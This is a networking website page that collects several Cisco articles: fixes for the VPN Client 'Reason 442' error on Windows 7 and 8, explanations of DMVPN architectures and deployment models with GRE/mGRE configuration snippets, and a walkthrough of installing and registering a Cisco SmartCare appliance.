After a couple of seconds the Cisco VPN client will timeout, fail and eventually the connection is terminated. The user is then greeted by a pop up window explaining that the VPN failed with a Reason 442: Failed to enable Virtual Adaptor error:

Cisco vpn client Error 442 failed to enable virtual adaptor

Note: It’s always a great idea to have the latest Cisco VPN client installed. Users can download the Cisco VPN client for Windows, Linux and MacOS operating systems by visiting our Cisco Tools & Applications download section.

Introducing The Fix – Workaround

Thankfully the fix to this problem is simple and can be performed even by users with somewhat limited experience.

Here are 4 easy-to-follow steps to the solution:

1. Open your Windows Registry Editor by typing regedit in the Run prompt.

2. Browse to the Registry Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CVirtA

3. From the window on the right, select and right-click on DisplayName and choose Modify from the menu. Alternatively, double-click on DisplayName:

Cisco vpn client windows 8 registry

4. For Windows 8 32bit (x86) operating systems, change the value data from @oem8.inf,%CVirtA_Desc%;Cisco Systems VPN Adapter to Cisco Systems VPN Adapter.

For Windows 8 64bit (x64) operating systems, change the value data from @oem8.inf,%CVirtA_Desc%;Cisco Systems VPN Adapter for 64-bit Windows to Cisco Systems VPN Adapter for 64-bit Windows (shown below):

Cisco vpn client registry fix value data

When done editing the Value data, click on OK and close the Registry Editor.

You can now run the Cisco VPN Client and connect to your VPN network.  Changes performed do not require a system restart.

  • Hits: 449222

Comparing DMVPN Single Tier and Dual Tier Headend Architectures - IPSec VPN & mGRE Termination

This article extends our DMVPN article series by answering common questions regarding the differences between Single Tier Headend and Dual Tier Headend architectures.

When hearing the DMVPN terms single tier or dual tier it can be difficult to understand exactly their meanings.  While the difference between the two might seem clear when looking at a DMVPN with single or dual tier headend setup, what really goes on is usually not revealed or analysed in great depth, until now…

While there are plenty of diagrams online illustrating Single Tier and Dual Tier Headend architectures, we found none that would analyse the differences on a packet/protocol level. This is usually the level of analysis many engineers require to truly understand how each model works.

We always assume the DMVPN network (mGRE tunnel) is protected using the IPSecurity protocol.

Single Tier Headend

Single Tier Headend involves a DMVPN setup with one single Hub router responsible for all DMVPN services. Practically, this means both Crypto IPSec and mGRE tunnel terminate on the same router, the Hub.

This is illustrated in our detailed diagram below:

Cisco DMVPN single tier headend IP Sec Tunnel mode

In Single Tier Headend IPSec runs in Tunnel Model, encrypting the whole GRE tunnel and Data carried within. This ensures true confidentiality of our GRE tunnel and provides great flexibility in terms of VPN network design.

Engineers and Administrators who would like to learn more about protecting GRE using IPSec (both Tunnel and Transport Mode) can read our popular  GRE over IPSec - Selecting and Configuring GRE IPSec Tunnel or Transport Mode article. We high recommend the above article as it contains extremely useful information, not found easily!

As expected, a Single Tier Headend setup means that all processing is performed by one single device. The burden of encrypting, decrypting, encapsulating, decapsulating and maintaining the NHRP database falls on a single Hub. As a rule of thumb, the faster the Internet connection speed on the Hub router the bigger the burden will be on its CPU as it needs to process VPN data at a much faster rate. DMVPN scalability issues is a topic that will be covered on Firewall.cx.

DMVPN deployments based on Single Tier Headend architecture also support spoke-to-spoke VPN tunnels, allowing remote offices to dynamically build VPN tunnels between each other. Remote offices (spokes) are also configured with mGRE tunnels (like the Hub), allowing them to create the dynamic spoke-to-spoke tunnels.

Dual Tier Headend

Dual Tier Headend is a more popular approach to DMVPN, especially when it comes to VPN redundancy. Cisco usually uses this method when analysing DMVPN networks, however, this does not mean the Single Tier is not an acceptable solution.

With Dual Tier Headend Crypto IPSec terminates on a router positioned in front of the Hub, while the mGRE tunnel terminates on the Hub. This is illustrated in our detailed diagram below:

Cisco DMVPN Dual tier headend IP Sec Tunnel Mode

In Dual Tier Headend IPSec runs in Tunnel Model, encrypting the whole GRE tunnel and Data carried within. IPSec decryption occurs on R2, the Frontend router, and the mGRE tunnel is passed to the Hub where it terminates.

DMVPN deployments based on Dual Tier Headend architecture do not support spoke-to-spoke VPN tunnels. This limitation should be seriously considered if planning for this type of DMVPN deployment. This also explains why spoke routers in this deployment method are configured with single GRE tunnels (not mGRE).

Links To GRE - DMVPN - IPSec VPN Articles

Firewall.cx hosts a number of popular articles for those requiring additional information on DMVPN networks and IPSec VPNs. Below are a few hand-picked links to articles we are sure will be useful:

  1. Configuring Cisco SSL VPN AnyConnect (WebVPN) on Cisco IOS Routers
  2. Understanding VPN IPSec Tunnel Mode and IPSec Transport Mode - What's the Difference?
  • Hits: 34316

Dynamic Multipoint VPN (DMVPN) Deployment Models & Architectures

Following our successful article Understanding Cisco Dynamic Multipoint VPN - DMVPN, mGRE, NHRP, which serves as a brief introduction to the DMVPN concept and technologies used to achieve the flexibility DMVPNs provide, we thought it would be a great idea to expand a bit on the topic and show the most common DMVPN deployment models available today which include: Single DMVPN Network/Cloud  - Single Tier Headend Architecture, Single DMVPN Network/Cloud  - Dual Tier Headend Architecture, Dual DMVPN Network/Cloud – Single Tier Headend Architecture and Dual DMVPN Network/Cloud – Dual Tier Headend Architecture. This will provide an insight to engineers and IT Managers considering implementing a DMVPN network.

Those seeking help to configure a DMVPN network can also refer to our Configuring Cisco Dynamic Multipoint VPN (DMVPN) - Hub, Spokes , mGRE Protection and Routing - DMVPN Configuration article which fully covers the deployment and configuration of a Single DMVPN Network/Cloud  - Single Tier Headend Architecture.

DMVPN Deployment Models

There is a number of different ways an engineer can implement a DMVPN network. The fact that there is a variety of DMVPN models, each one with its caveats and requirements, means that almost any VPN requirement can be met as long as we have the correct hardware, software license and knowledge to implement it.

Speaking of implementation, no matter how complex the DMVPN network might get, it’s pretty straightforward once it's broken down into sections.

Engineers already working with complex DMVPNs can appreciate this and see the simplicity in configuration they offer.  At the end, it’s all a matter of experience.

Providing configuration for each deployment model is out of this article’s scope, however, we will identify key services used in each deployment model along with their strong and weak points.

Future articles will cover configuration of all DMVPN deployment models presented here.

Following are the most popular DMVPN deployment models found in over 85% of DMVPN networks across the globe:

  • Single DMVPN Network/Cloud  - Single Tier Headend Architecture
  • Single DMVPN Network/Cloud  - Dual Tier Headend Architecture
  • Dual DMVPN Network/Cloud – Single Tier Headend Architecture
  • Dual DMVPN Network/Cloud – Dual Tier Headend Architecture

In every case a complete DMVPN deployment consists of the following services, also known as control planes:

  1. Dynamic Routing (Next Hop Resolution Protocol)
  2. mGRE Tunnels
  3. Tunnel Protection – IPSec Encryption that protects the GRE tunnel and data

It’s time now to take a look at each deployment model.

Single DMVPN Network/Cloud - Single Tier Headend Architecture

The Single DMVPN - Single Tier Headend deployment model is DMVPN in its simplest form.  It consists of the main Hub located at the headquarters and remote spokes spread amongst the remote offices.

Single DMVPN - single Tier Headend architecture

The term ‘Single DMVPN’ refers to the fact there is only one DMVPN network in this deployment.  This DMVPN network consists of the yellow GRE/IPSec Hub-and-Spoke tunnels terminating at the central Hub from one end and the remote spokes on the other end.

The term ‘Single Tier Headend’ means that all control planes are incorporated into a single router – the Hub. This means it takes care of the dynamic routing (NHRP), mGRE tunnels and IPSec Tunnel Protection.

The central hub maintains the Next Hop Resolution Protocol (NHRP) database and is aware of each spoke’s public IP address.

When setting up a DMVPN network, every spoke is configured, using static NHRP mappings, to register with the Hub. Through this process, every spoke is aware of every other’s public IP address via the NHRP server (Hub), no matter if the spokes IP addresses are dynamic or static.

Through DMVPN, each spoke is able to dynamically build a VPN tunnel to each other spoke, allowing the direct communication between them without needing to tunnel all traffic through the main Hub. This saves valuable bandwidth, time and money.

We should at this point note that in Phase 1 DMVPN, all traffic passes through the Hub.  Phase 2 and Phase 3 DMVPN, directly forms spoke-to-spoke tunnels and sends traffic directly, bypassing the Hub.

The Single DMVPN - Single Tier Headend Architecture has the advantage of requiring only one Hub router, however, the Hub’s CPU is also the limiting factor for this deployment’s scalability as it undertakes all three control planes (NHRP, mGRE & IPSec protection). 

In addition the Hub router, and its link to the Internet, is the single point of failure in this design. If any of the two (Hub or Internet link) fail, it can cripple the whole VPN network.

This DMVPN model is a usual approach for a limited budget DMVPN network with a few remote branches.  Routing protocols are also not required when implementing a single DMVPN network/cloud. Instead, static routes can be used with the same end result.

Single DMVPN Network/Cloud - Dual Tier Headend Architecture

The Single DMVPN Network/Cloud or Dual Tier Headend DMVPN deployment consists of two routers at the headquarters. The first router, R1, is responsible for terminating the IPSec connections to all spokes, offloading the encryption and decryption process from the main Hub behind it. The Hub router undertakes the termination of mGRE tunnel, NHRP server and processing of all routing protocol updates.

Single DMVPN - Dual Tier Headend architecture

The only real advantage offered by the Dual Tier Headend Architecture (Single DMVPN cloud) is that it can support a significantly greater number of spokes.

A limitation of Dual Tier Headend Architecture is the absence of the spoke-to-spoke connections, in Dual Tier DMVPN spoke-to-spoke connections are not supported. 

Dual DMVPN Network/Cloud – Single Tier Headend Architecture

The Dual DMVPN topology with spoke-to-spoke deployment consists of two headend routers, Hub 1 and Hub 2.  Each DMVPN network (DMVPN 1 & DMVPN 2) represents a unique IP subnet, one is considered the primary DMVPN while the other is the secondary/backup DMVPN.

Dual DMVPN - Single Tier Headend architecture

The dynamic Spoke-to-Spoke tunnels created between branches must be within a single DMVPN network.  This means that spoke-to-spoke tunnels can only be created between spokes in the same DMVPN network. 

With Dual DMVPN – Single Tier Headend Architecture, each Hub manages its own DMVPN network. Each Hub undertakes the task of IPSec encryption/decryption, mGRE Tunnel termination and NHRP Server for its DMVPN network.  A routing protocol such as EIGRP or OSPF is usually implemented in this type of setup to ensure automatic failover in case the primary DMVPN fails.

Dual DMVPN – Single Tier Architecture is considered an extremely flexible and scalable setup as it combines the best of both worlds – that is, true redundancy with two separate Hubs and DMVPN networks, plus support for spoke-to-spoke tunnels.

Dual DMVPN Network/Cloud – Dual Tier Headend Architecture

The Dual DMVPN Network – Dual Tier Headend combines the previous two deployment methods in one setup. It consists of two Hubs that deal only with mGRE tunnels and NHRP services, each Hub managing its own DMVPN network.

Frontend routers R1 and R2 take care of all IPSec termination for all spokes, performing encryption/decryption as data enters or exits the IPSec tunnels.

Newer ISR G2 routers are capable of undertaking great quantities of number crunching for all VPN tunnels as they are equipped with hardware accelerated VPN modules that offload this process from the main CPU.

Dual DMVPN - Dual Tier Headend architecture

As with Dual DMVPN – Single Tier deployment model, each Hub manages its own DMVPN network and connections with its spokes. Routing protocols are a necessity to ensure automatic failover to the secondary DMVPN network in case the primary fails.

Unfortunately, as with all Dual Tier deployments, we lose the spoke-to-spoke ability, but this might not be a limitation for some.

Acknowledgements

We would like to thank Saravana Kumar from the Cisco VPN TAC Support team for his valuable feedback and help.

Summary

This article examined the different types of DMVPN deployments and covered the following deployment models: Single DMVPN Network/Cloud  - Single Tier Headend Architecture, Single DMVPN Network/Cloud  - Dual Tier Headend Architecture, Dual DMVPN Network/Cloud – Single Tier Headend Architecture and finally Dual DMVPN Network/Cloud – Dual Tier Headend Architecture.

  • Hits: 100981

Understanding Cisco Dynamic Multipoint VPN - DMVPN, mGRE, NHRP

Dynamic Multipoint VPN (DMVPN) is Cisco’s answer to the increasing demands of enterprise companies to be able to connect branch offices with head offices and between each other while keeping costs low, minimising configuration complexity and increasing flexibility.

Note: Users familair with DMVPN can also visit our article Configuring Cisco Dynamic Multipoint VPN (DMVPN) - Hub, Spokes , mGRE Protection and Routing

With DMVPN, one central router, usually placed at the head office, undertakes the role of the Hub while all other branch routers are Spokes that connect to the Hub router so the branch offices can access the company’s resources. DMVPN consists of two mainly deployment designs:

  • DMVPN Hub & Spoke, used to perform headquarters-to-branch interconnections
  • DMVPN Spoke-to-Spoke, used to perform branch-to-branch interconnections

In both cases, the Hub router is assigned a static public IP Address while the branch routers (spokes) can be assigned static or dynamic public IP addresses.

cisco dmvpn introduction - basic diagram

DMVPN combines multiple GRE (mGRE) Tunnels, IPSec encryption and NHRP (Next Hop Resolution Protocol) to perform its job and save the administrator the need to define multiple static crypto maps and dynamic discovery of tunnel endpoints.

NHRP is layer 2 resolution protocol and cache, much like Address Resolution Protocol (ARP) or Reverse ARP (Frame Relay).

The Hub router undertakes the role of the server while the spoke routers act as the clients. The Hub maintains a special NHRP database with the public IP Addresses of all configured spokes.

Each spoke registers its public IP address with the hub and queries the NHRP database for the public IP address of the destination spoke it needs to build a VPN tunnel.

dmvpn nhrp communicationmGRE Tunnel Interface is used to allow a single GRE interface to support multiple IPSec tunnels and helps dramatically to simplify the complexity and size of the configuration.

Following is an outline of the main differences between GRE and mGRE interfaces:

A GRE interface definition includes:

  • An IP address  
  • A Tunnel Source
  • A Tunnel Destination
  • An optional tunnel key
interface Tunnel 0
ip address 10.0.0.1 255.0.0.0
tunnel source Dialer1
tunnel destination 172.16.0.2
tunnel key 1

An mGRE interface definition includes:

  • An IP address
  • A Tunnel source
  • A Tunnel key
interface Tunnel 0
ip address 10.0.0.1 255.0.0.0
tunnel source Dialer 1
tunnel mode gre multipoint
tunnel key 1

It is important to note that mGRE interfaces do not have a tunnel destination. Because mGRE tunnels do not have a tunnel destination defined, they cannot be used alone.  NHRP fills this gap by telling mGRE where to send the packets.

DMVPN Benefits

DMVPN provides a number of benefits which have helped make them very popular and highly recommended. These include:

  • Simplified Hub Router Configuration. No more multiple tunnel interfaces for each branch (spoke) VPN. A single mGRE, IPSec profile without any crypto access lists, is all that is required to handle all Spoke routers. No matter how many Spoke routers connect to the Hub, the Hub configuration remains constant.
  • Full Support for Spoke Routers with Dynamic IP Addressing. Spoke routers can use dynamic public IP Addresses. Thanks to NHRP, Spoke routers rely on the Hub router to find the public IP Address of other Spoke routers and construct a VPN Tunnel with them.
  • Dynamic Creation of Spoke-to-Spoke VPN Tunnels. Spoke routers are able to dynamically create VPN Tunnels between them as network data needs to travel from one branch to another.
  • Lower Administration Costs. DMVPN simplifies greatly the WAN network topology, allowing the Administrator to deal with other more time-consuming problems. Once setup, DMVPN continues working around the clock, creating dynamic VPNs as needed and keeping every router updated on the VPN topology.
  • Optional Strong Security with IPSec. Optionally, IPSecurity can be configured to provide data encryption and confidentiality. IPSec is used to secure the mGRE tunnels by encrypting the tunnel traffic using a variety of available encryption algorithms. More on GRE IPSec can be found on our Configuring P-to-P GRE VPN IPSec Tunnels article.

DMVPN Case Study - DMVPN = Configuration Reduction and Simplified Architecture

As stated, DMVPN greatly reduces the necessary configuration in a large scale VPN network by eliminating the necessity for crypto maps and other configuration requirements.

To help demonstrate the level of simplicity and dramatic reduction of administrative overhead, we’ve worked on an example from Cisco.com and made it a bit more realistic to help show how much DMVPN does really help when it comes to configuration complexity and length.

The following requirements have been calculated for a traditional VPN network of a company with a central hub and 30 remote offices. All GRE tunnels are protected using IPSec:

Before DMVPN With p-pGRE + IPSec Encryption

  • Single GRE interface for each spoke
  • All tunnels for each spoke (remote office) need to be predefined:
    • Use of static tunnel destination
    • Requires static addresses for spokes
    • Supports dynamic routing protocols
  • Large hub configuration (HQ Router)
    • 1 interface/spoke -> 30 spokes = 30 tunnel interfaces
    • 7 lines per spoke -> 30 spokes = 210 configuration lines
    • 4 IP addresses per spoke -> 30 spokes = 120 addresses
  • Addition of spokes requires changes on the hub
  • Spoke-to-Spoke traffic must pass through the hub.

The diagram below shows a point-to-point GRE VPN network. All spokes connect directly to the hub using a tunnel interface. The hub router is configured with three separate tunnel interfaces, one for each spoke:

dmvpn GRE tunnels hub-spoke Each GRE tunnel between the hub-spoke routers is configured with its unique network ID.  For example, GRE tunnel between the HUB and Remote Office 1 could use network 10.0.0.0/30, while GRE tunnel between the HUB and Remote Office 2 could use 10.0.1.0/30 etc.

In addition, the hub router has three GRE tunnels configured, one for each spoke, making the overall configuration more complicated.  In case no routing protocol is used in our VPN network, the addition of one more spoke would mean configuration changes to all routers so that the new spoke is reachable by everyone.

Lastly, traffic between spokes in a point-to-point GRE VPN network must pass through the hub, wasting valuable bandwidth and introducing unnecessary bottlenecks.

After DMVPN With mGRE + IPSec Encryption

  • One mGRE interface supports ALL spokes. Multiple mGRE interfaces are allowed, in which case each is a separate DMVPN.
  • Dynamic Tunnel Destination simplifies support for dynamically addressed spokes with the use of NHTP registration and dynamic routing protocols
  • Smaller hub configuration (HQ Router)
    • 1 interface for all 30 spokes = 1 tunnel interfaces
    • Configuration including NHRP for 30 spokes = 15 lines
    • 7 lines per spoke -> 30 spokes = 210 configuration lines
    • All spokes in the same subnet -> 30 spokes  = 30 addresses
  • No need to touch the hub for new spokes
  • Spoke-to-Spoke traffic via the hub or directly.

mGRE dramatically simplifies the overall setup and configuration of our VPN network. With mGRE, all spokes are configured with only one tunnel interface, no matter how many spokes they can connect to. All tunnel interfaces are part of the same network. In our diagram below, this is network 10.0.0.0/29.

dmvpn traffic dynamic spoke to spoke tunnel

Furthermore, spoke-to-spoke traffic no longer needs to pass through the hub router but is sent directly from one spoke to another.

It should be clear how much simpler and easier DMVPN with mGRE is when compared with IPSec VPN Crypto tunnels or point-to-point GRE.

Cisco DMVPN IOS Version Support

While DMVPN was introduced in the earlier 12.3.19T IOS versions it is highly recommended to use the latest possible IOS. This will ensure VPN stability and access to new DMVPN features found only on the latest IOS.

Summary - More DMVPN Articles

It is evident that DMVPN is not just another VPN technology but a revolution to VPN architecture design.  The flexibility, stability and easy setup it provides are second-to-none, making it pretty much the best VPN solution available these days for any type of network.

To learn how to configure a DMVPN network, you can read our Configuring Cisco Dynamic Multipoint VPN (DMVPN) - Hub, Spokes , mGRE Protection and Routing article.

  • Hits: 228916

Troubleshooting Cisco VPN Client Windows 7 - How To Fix Reason 442: Failed to Enable Virtual Adapter

This article shows how to fix the Cisco VPN Reason 442: Failed to enable Virtual Adapter error on the Windows 7 (32bit or 64bit) operating system. If you are a Windows 7 user, it's most likely you've stumbled into the Cisco VPN Client error message "Reason 442: Failed to enable Virtual Adapter". We provide a way to quickly fix this error and get your VPN client working. We also cover Windows 8 and Windows 10 operating systems.

cisco-vpn-client-error-442Unfortunately the good old 'remove and reinstall' method won't get you far in this case as the problem is not within the Cisco VPN client program, but Microsoft's Internet Connection Sharing (ICS) service.

Windows 8 32bit & 64bit users dealing with the same problem can refer to our Cisco VPN Client & Windows 8 (32bit & 64Bit) - Reason 442: Failed To Enable Virtual Adaptor - How To Fix It article.

Windows 10 32bit & 64bit can read our article Install & Fix Cisco VPN Client on Windows 10 (32 & 64 Bit). Fix Reason 442: Failed to enable Virtual Adapter.

Windows 10 32bit & 64bit Anniversary Update 1607 users can read our Fix Cisco VPN Client Break After Windows 10 Anniversary Update 1607.


Following the steps outlined below will help resolve this error and save you a lot of time and frustration:

1. Hit the start button and type "services.msc' as shown:

cisco-vpn-client-error-442-2

2. Locate and stop Cisco Systems, Inc. VPN Service;

3. Stop and disable Internet Connection Sharing (ICS) Service;

4. Restart Cisco System, Inc. VPN Service.

Launch the Cisco VPN Client again, and the problem is now gone!

Keep in mind that we are running Cisco Systems VPN Client version 5.0.07.0440 on Windows 7 Ultimate 64-bit edition, but we faced the same problem with other versions as well.

Note: It’s always a great idea to have the latest Cisco VPN client installed. Users can download the Cisco VPN client for Windows, Linux and MacOS operating systems by visiting our Cisco Tools & Applications download section.

  • Hits: 473421

Cisco SmartCare Update - Next Generation Appliance

It's been more than a year since we introduced the Cisco SmartCare service and appliance. It's been extremely popular and has successfully penetrated the Cisco market with installations continually increasing.

Since the presentation of the new SmartCare service on Firewall.cx some things have changed, which is the reason we decided to write  an update on the original article. 

Firstly, the Cisco SmartCare appliance has changed. With the termination of collaboration between Cisco and HP, Cisco no longer supplies HP-based SmartCare appliances; these have been replaced by IBM-based servers, which are a lot shorter and lighter.  The SmartCare appliance is much easier to install and doesn't require a lengthy rack to fit in properly.

While the operating system is still Linux, the distribution used now is the popular CentOS v5.3 with kernel version 2.6.18-128.el5 - essentially a repackaged RedHat Enterprise Linux. This operating system runs on 3.5 Gigs of installed memory and an Intel-based CPU. The hard drive is a Seagate Barracuda SATA 250GB spinning at 7200rpm.

As expected, the box the appliance arrives in is very small compared to the original SmartCare appliance. The box is similar to that of a Cisco 2960G Catalyst switch and contains mounting brackets plus a SATA cable and a few screws which we couldn't find a use for!

cisco smartcare appliance box

Continue reading

  • Hits: 24289

The Cisco Smart Care Service & Appliance

Cisco, as most IT engineers know, covers a wide range of products and services. These range from routers to switches, firewalls, intrusion prevention systems (ips), intrusion detection systems (ids), servers, wireless lan controllers (wlc), wireless access points and much more.

What a lot people aren't aware of is that most of these products come with a 90 day warranty - something that's really odd when compared with other vendors who usually offer at least one year warranty. On the other hand, only a number of hand-picked Cisco devices offer lifetime-limited warranty - for example, the Cisco Catalyst switches (lower to mid range models). Effectively, these lifetime-limited covered devices means that if they fail, it takes 20-25 days for Cisco to replace them.

For the above, and many more reasons, you should always choose to purchase the additional warranty extension service for each device. This is know as a 'SmartNet service'.

The Cisco SmartNet service comes in many variations, however in its most basic form, it extends up to one year the warranty for the device it is purchased, with a next business day replacement (NBD). The SmartNet service also entities you to download minor upgrade for the device's IOS or firmware.

The big problem with SmartNet service is that when dealing with a lot of equipment e.g 8 routers, 15 switches, 2 firewalls, it can get quite tricky and you need to ensure the renewal of every SmartNet happens within a specific period, otherwise you'll need to pay a lot more money to renew it.

Sounds fussy and a laborious task? Want more from Cisco than a simple warranty coverage?

Enter the Cisco SmartCare service.....

The Cisco Smart Care service is the most advanced support services Cisco has offered until now. Due to the extensive features and services offered within the Smart Care service, we've broken the article down into smaller sections to make it easier to follow.

Cisco Smart Care Service

The Cisco Smart Care service is a new and much sophisticated approach in covering expensive Cisco equipment. The Smart Care service aims to help simplyfy the whole process while providing a lot more for your money.

The Smart Care service of course covers completely everything the SmartNet service does, but also adds the following benefits:

  • Simplified Contract. Everything you have with a Cisco logo is covered under one contract.
  • Access to advanced Cisco Technical Assistance Center (TAC) for help around the clock.
  • Free Cisco Smart Care appliance (Hold on, we'll analyse this soon).
  • 24/7 Monitoring of your Cisco equipment.
  • Delivers dashboard visibility into network performance
  • Proactive network scanning for software vulnerabilities and security risks
  • Security assesments of your device configurations according to Cisco's security guidelines
  • VoIP assessment of your network (for networks with VoIP Smart Care services)
  • Cheaper coverage. As it turns out, the more Cisco equipment you cover, the cheaper it gets when compared to the traditional SmartNet service.

When your Cisco Smart Care service is purchased and enabled, you'll receive the Cisco Smart Care appliance within a couple of days.

Through this appliance, all Cisco network equipment covered under the Smart Care contract, are monitored 24/7. This information is encrypted and sent directly to the Cisco Smart Care center for processing and is almost immediately made available to your Cisco Partner via the Smart Care portal.

Your Cisco partner can, and should, provide you with access to the Smart Care portal so you can see all information provided by Cisco, that is associated with your network. Reports and warnings generated by the Smart Care appliance are sent to your Cisco partner and can also be configured so you (the network administrator) receive them as well.

The Cisco Smart Care Appliance

The Cisco Smart Care appliance can only be deployed only by your authorised Cisco Smart Care partner. Keep in mind that the Cisco 'Smart Care certifed' certification is a separate certification in addition to the ones your partner might already have aquired. This means that no matter what certification level your Cisco partner has (SMB, Premier, Silver or Gold), they need to also be Smart Care certified.

The Cisco Smart Care appliance is basically a HP Proliant DL server with the Cisco brand on it, much like the Cisco Call Manager servers. At the time, the model we received was powered by an Intel Celeron Processor running at 3.2 Ghz with a 533Mhz bus and is bundled with 1GB RAM and a single Western Digital 74.6 GB SATA hdd.

tk-cisco-smartcare-1

We must agree that the specifications for this server are extremely low, however because its running on a customised Linux kernel, we can justify the server's specifications. By the way, don't expect to find a floppy or DVD drive - they've been removed and replaced by plastic covers.

Speaking of covers, we thought it would be nice if we opened our Smart Care appliance and see what's inside it, and we did just that:

tk-cisco-smartcare-2

At a first glance, the server's fanless CPU, Ram and SATA hdd grabs your attention. In front of the CPU you'll notice an array of fans designed to constantly blow cool air through the CPU's heatsink keeping its temperature low, but also cooling at the same time the motherboard and other circuits. This is a classical design for these type of servers. On the lower left part of the picture you can see the server's power supply, bundled with two additional fans in front forcing cool air to enter the area from the front, skimming the hdd and cooling it as well.

Turning the appliance backwards, you'll find all necessary interfaces, including a serial port which is all you really need to setup the server.

tk-cisco-smartcare-3

Provided with the server is a DB9 serial cable (shown below on the right side) which is basically a null-modem serial cable with the TX & RX pins in cross-over mode:

tk-cisco-smartcare-4

Since almost all laptops today do not feature a serial port, you'll need to use a USB-to-Serial adaptor like the one shown left in the above picture. Alternatively, you can simply connect a VGA monitor and a keyboard to proceed with the setup. We've decided to go ahead using the serial cable, rather than a monitor.

When you first power on the Smart Care, you'll get the well-know bios post test and a brief summary of the system's configuration as shown below:

tk-cisco-smartcare-5

Following the post test is the system bootup which doesn't really show anything else other than a message telling you that its booting the kernel. Once the system has loaded, it will prompt for a login name and password. The factory defaults for this are 'cisco' and 'cisco'.

tk-cisco-smartcare-6

The first step required once your Smart Care appliance boots up, is to configure it with the appropriate network settings in order to obtain Internet access and update the appliance software.

Configuring the Appliance Network Settings

To configure the network settings, you need to enter Priveliged Mode just as you would with a Cisco router or switch. Type 'enable' and enter 'admin' as a password when prompted.

You'll see the hash # character at the prompt, indicating you've now entered priveliged mode. Typing ? will present all available options as shown below:

The conf ip command will launch a series of prompts asking for the system's IP Address, Subnet mask, Gateway, DNS servers and proxy server, however we highly advise you enable a DHCP server on your network that will provide all this information automatically.

Our approach was to use a DHCP server and by issuing the 'show net' command we were able to verify the correct settings of our Smart Care appliance:

tk-cisco-smartcare-8

As with all Cisco products, you can enter a simple 'ping' command toward a domain to ensure the DNS resolution process is working correctly and there is in fact connectivity with the Internet.

tk-cisco-smartcare-9

Updating the Cisco Smart Care Appliance

Updating the Cisco Smart Care appliance is a necessity because if you don't upgrade it, it simply won't work.

The first time we performed the update, we had a problem downloading the new image and were required to open a Cisco TAC case as the appliance is not able to automatically find the necessary update and download it. Hopefully this will be fixed in the newer versions of the appliance so updating it would simply mean to execute a command and nothing more.

Envoking the update process is easy: At the prompt #, simply type the command update and hit enter. The Cisco Smart Care appliance will ask you to confirm the upgrade of the client:

tk-cisco-smartcare-10

After answering y for yes, the system will move to the 'client update' page to continue the process.

The client update page is very simple and requests the following two peices of information:

1) URL from which the Cisco Smart Care appliance is able to download the necessary image

2) Cisco Connection Online (known as 'CCO') account name & password

Keep in mind that when entering your CCO password, the system will not show it on the screen, but instead the field is kept blank:

tk-cisco-smartcare-11

The url seems a bit wierd at a first glance because of its length, the system wraps it at the end of the screen, giving it an aweful look. Assuming all the information provided is correct, the Cisco Smart Care appliance will automatically start downloading the new update providing you with constant feedback on the download speed. The image download is about 55Mb, so if your on a fast ASDL connection, its a matter of minutes.

This update can only be performed online. You cannot download the image and install it from your computer as you would with an IOS image!

As soon as the image download is complete, you are prompted with a few details about the installation that will proceed, plus a final confirmation that you wish to perform the update:

tk-cisco-smartcare-12

After you press 'y' and 'enter', confirming to proceed with the update, the system will start to upwrap the image it downloaded and begins the installation as shown below:

tk-cisco-smartcare-13

The installation process is monitored easily through the stars * on the screen. We don't know what eactly one unique star represents, but that doesn't really matter :) As soon as the update is complete, the system notifies the installer with a 'Installation Complete' message and immediately begins the restart process to load the newly updated software.

When the Cisco Smart Care appliance completes its reboot, you'll need to perform the whole login process again, until you reach the '#' prompt. At that point, we can issue the '?' command and see the available menu options. If you compare the options with the ones before the update, (shown at the begining of this page - first screenshot), we'll see there is a noticeable difference.

tk-cisco-smartcare-14

Now that we have updated the Cisco Smart Care appliance, we need to register it with Cisco. This registration is necessary so we can finally tie the appliance to the end customer.

To kick-start the registration, simply enter the 'register' command and the registration screen will make its appearance:

tk-cisco-smartcare-15

Taking the settings from top to bottom, we leave the first three options 'as is' and move to the fourth where enter again the partner CCO account and password. Next, we can provide a name for the appliance to help us indicate which customer is it for. The name above has been smudged out to ensure privacy.

We confirm at the end that all above information is correct and the appliance proceeds to contact Cisco and register itself. A confirmation message is shown, indicating tha the registration was successful.

Assigning & Enabling the Cisco Smart Care Appliance

Once the Cisco Smart Care appliance has registered with Cisco, we need to assign it to the end customer. This process binds the appliance to the specific customer and the contract invoked.

For this process, the partner must log into the Cisco Smart Care portal.

The main page at the Cisco Smart Care portal provides all the necessary configuration and monitoring options for all appliances installed.

From the menu on the left, we select the Administration menu and then Assessment Appliances to assign the registered appliance to the appropriate customer.

When selected, the Assessment Appliances screen will show all registered appliances no matter what state they are in. As shown in the screenshot below, our hardware client is registered, but remains unassigned to the customer.

tk-cisco-smartcare-17

To assign the appliance, we select the appliance and then click on the Assign/Unassign button located on the lower left corner of the Cisco Network Assessment Appliances table.

Once the Assign/Unassign button is pressed, a final confirmation is required before the assignment process begins. After confirming by pressing OK, the process begins:

tk-cisco-smartcare-18

The Cisco Smart Care portal will contact the appliance and after a brief secure exchange of data, the appliance will be assigned to the customer.

tk-cisco-smartcare-19

Once this phase of the process is complete, we need to enable the Smart Care appliance installed as the customer's site. To do this, under the customer's menu, we select Administration and then Assessment Appliance Configuration.

Once the page loads we click on view and wait for the next window to open

tk-cisco-smartcare-20

The next page provides us with the option to finally enable the network appliance installed at our customer's site. Click on the drop-down box, select Enabled and then click on the Save button.

tk-cisco-smartcare-21

Once the Save button is pressed, the Smart Care portal will queue the necessary commands and send them to the Smart Care appliance to enable it, providing the Cisco engineer with a number of additional tasks within the Smart Care portal.

tk-cisco-smartcare-22

Discovering Cisco Devices

As soon as the appliance is enabled, the Smart Care portal will refresh and show its status alongside with the services activated and their respective version. This particular customer has a Level 3 service which includes routing, switching and voice services (Cisco Unified CallManager Express).

Level 3 services indicate a higher complexity network and therefore offer additional services such as Voice Monitor, Voice Quality Monitor and other related services as shown in the screenshot above.

At this point, we need to discover our Cisco network devices and add them to the portal. This process is usually handled during the contract setup by your Cisco Partner, and therefore all covered equipment are already listed with their product codes and serial numbers, however the system does not contain any IP Addresses, SNMP passwords (required for the SmartCare appliance to connect to the devices) e.t.c.

We now head over to the Discovered Devices menu on the left and click the Perform New Discovery button which brings up the Service Control screen where we can run a number of services by either scheduling them or running them at that moment.

The first step here is to select the Run Now... button which will trigger the 3-step discovery process so that the Smart Care appliance can discover all Cisco devices that will be included in the Smart Care contract. These devices will be permanently monitored by the appliance once added.

tk-cisco-smartcare-24

